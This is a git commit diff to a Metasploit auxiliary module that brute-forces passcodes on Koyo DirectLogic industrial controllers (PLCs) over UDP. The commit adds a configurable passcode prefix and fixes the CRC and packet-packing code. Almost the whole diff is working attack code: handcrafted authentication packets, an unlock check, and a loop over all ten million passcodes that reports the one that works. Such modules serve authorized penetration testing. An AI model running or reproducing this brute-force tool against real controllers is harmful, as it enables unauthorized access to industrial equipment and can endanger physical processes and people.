Fix up koyo login
This commit is contained in:
parent
246ebca940
commit
2c473e3cdd
|
@ -21,9 +21,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'Koyo DirectLogic PLC Password Brute Force Utility',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module attempts to authenticate to
|
||||
a locked Koyo DirectLogic PLC. The PLC uses a restrictive
|
||||
passcode, which can be A0000000 through A9999999.
|
||||
This module attempts to authenticate to a locked Koyo DirectLogic PLC.
|
||||
The PLC uses a restrictive passcode, which can be A0000000 through A9999999.
|
||||
The "A" prefix can also be changed by the administrator to any other character,
|
||||
which can be set through the PREFIX option of this module.
|
||||
|
||||
This module is based on the original 'koyobrute.rb' Basecamp module from
|
||||
DigitalBond.
|
||||
|
@ -43,12 +44,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptAddress.new('LHOST', [false, "The local IP address to bind to"]),
|
||||
OptInt.new('RECV_TIMEOUT', [false, "Time (in seconds) to wait between packets", 3]),
|
||||
OptString.new('PREFIX', [true, 'The prefix to use for the password (default: A)', "A"]),
|
||||
Opt::RPORT(28784)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@CCITT_16 = [
|
||||
@@CCITT_16 = [
|
||||
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
|
||||
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
|
||||
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
|
||||
|
@ -82,41 +84,42 @@ class Metasploit3 < Msf::Auxiliary
|
|||
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
|
||||
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
|
||||
]
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@udp_sock ||= {}
|
||||
@udp_sock[ip] = Rex::Socket::Udp.create(
|
||||
'LocalHost' => datastore['LHOST'] || nil,
|
||||
'PeerHost' => ip,
|
||||
'PeerPort' => rport,
|
||||
|
||||
# Create a socket in order to receive responses from a non-default IP
|
||||
@udp_sock = Rex::Socket::Udp.create(
|
||||
'PeerHost' => rhost,
|
||||
'PeerPort' => rport.to_i,
|
||||
'Context' => {'Msf' => framework, 'MsfExploit' => self}
|
||||
)
|
||||
print_status("#{ip}:#{rport} - KOYO - Checking the controller for locked memory...")
|
||||
if unlock_check(ip)
|
||||
print_good("#{ip}:#{rport} - Unlocked!")
|
||||
add_socket(@udp_sock)
|
||||
|
||||
print_status("#{rhost}:#{rport} - KOYO - Checking the controller for locked memory...")
|
||||
|
||||
if unlock_check
|
||||
# TODO: Report a vulnerability for an unlocked controller?
|
||||
print_good("#{rhost}:#{rport} - Unlocked!")
|
||||
return
|
||||
else
|
||||
print_status("#{ip}:#{rport} - KOYO - Controller locked; commencing bruteforce...")
|
||||
print_status("#{rhost}:#{rport} - KOYO - Controller locked; commencing bruteforce...")
|
||||
end
|
||||
|
||||
# TODO: Consider sort_by {rand} in order to avoid sequential guessing
|
||||
# or something fancier
|
||||
|
||||
(0..9999999).each do |i|
|
||||
|
||||
passcode = 'A' + i.to_s.rjust(7,'0')
|
||||
vprint_status("#{ip}:#{rport} - KOYO - Trying #{passcode}")
|
||||
|
||||
passcode = datastore['PREFIX'] + i.to_s.rjust(7,'0')
|
||||
vprint_status("#{rhost}:#{rport} - KOYO - Trying #{passcode}")
|
||||
bytes = passcode.scan(/../).map { |x| x.to_i(16) }
|
||||
passstr = bytes.pack("c*")
|
||||
print_debug passstr.inspect
|
||||
passstr = bytes.pack("C*")
|
||||
res = try_auth(passstr)
|
||||
next if not res
|
||||
|
||||
res = try_auth(ip, passstr)
|
||||
if res
|
||||
print_good "#{ip}:#{rport} - KOYO - Found passcode: #{passcode}"
|
||||
print_good "#{rhost}:#{rport} - KOYO - Found passcode: #{passcode}"
|
||||
report_auth_info(
|
||||
:host => ip,
|
||||
:port => rport,
|
||||
:host => rhost,
|
||||
:port => rport.to_i,
|
||||
:proto => 'udp',
|
||||
:user => '',
|
||||
:pass => passcode, # NOTE: Human readable
|
||||
|
@ -124,17 +127,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def crc16(buf, crc=0)
|
||||
buf.each_byte{|x| crc = ((crc<<8) ^ @CCITT_16[(crc>>8) ^ x])&0xffff}
|
||||
[crc].pack("S")
|
||||
buf.each_byte{|x| crc = ((crc << 8) ^ @@CCITT_16[( crc >> 8) ^ x]) & 0xffff }
|
||||
[crc].pack("n")
|
||||
end
|
||||
|
||||
def unlock_check(ip)
|
||||
def unlock_check
|
||||
checkpacket = "HAP\xe6\x01\x6e\x68\x0d\x00\x1a\x00\x09\x00\x01\x50\x01\x02\x00\x01\x00\x17\x52"
|
||||
@udp_sock[ip].sendto(checkpacket, ip, datastore['RPORT'].to_i)
|
||||
@udp_sock.sendto(checkpacket, rhost, rport.to_i)
|
||||
|
||||
recvpacks = 0
|
||||
# TODO: Since the packet count is critical, consider using Capture instead,
|
||||
|
@ -144,10 +147,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
#
|
||||
# Another way to speed things up is to use fancy threading, but that's for another
|
||||
# day.
|
||||
while (r = @udp_sock[ip].recvfrom(65535, 0.1) and recvpacks < 2)
|
||||
while (r = @udp_sock.recvfrom(65535, 0.1) and recvpacks < 2)
|
||||
res = r[0]
|
||||
if res.length == 269 # auth reply packet
|
||||
if res[17] == "\x00" and res[19] == "\xD2" # Magic bytes
|
||||
if res[17,1] == "\x00" and res[19,1] == "\xD2" # Magic bytes
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
@ -156,19 +159,19 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return false
|
||||
end
|
||||
|
||||
def try_auth(ip, passstr)
|
||||
def try_auth(passstr)
|
||||
data = "\x1a\x00\x0d\x00\x01\x51\x01\x19\x02\x04\x00" + passstr + "\x17\xaf"
|
||||
header = "HAP"
|
||||
header += "\xe5\x01" # random session ID
|
||||
header += crc16(data)
|
||||
header += [data.length].pack("S")
|
||||
header += [data.length].pack("n")
|
||||
authpacket = header + data
|
||||
|
||||
@udp_sock[ip].sendto(authpacket, ip, datastore['RPORT'].to_i, 0)
|
||||
@udp_sock.sendto(authpacket, rhost, rport.to_i)
|
||||
|
||||
2.times { @udp_sock[ip].get(recv_timeout) } # talk to the hand
|
||||
2.times { @udp_sock.get(recv_timeout) } # talk to the hand
|
||||
|
||||
status = unlock_check(ip)
|
||||
status = unlock_check
|
||||
|
||||
return status
|
||||
end
|
||||
|
@ -180,9 +183,4 @@ class Metasploit3 < Msf::Auxiliary
|
|||
datastore['RECV_TIMEOUT'].to_i.abs
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup
|
||||
@udp_sock.each_pair { |ip,sock| sock.shutdown rescue nil}
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue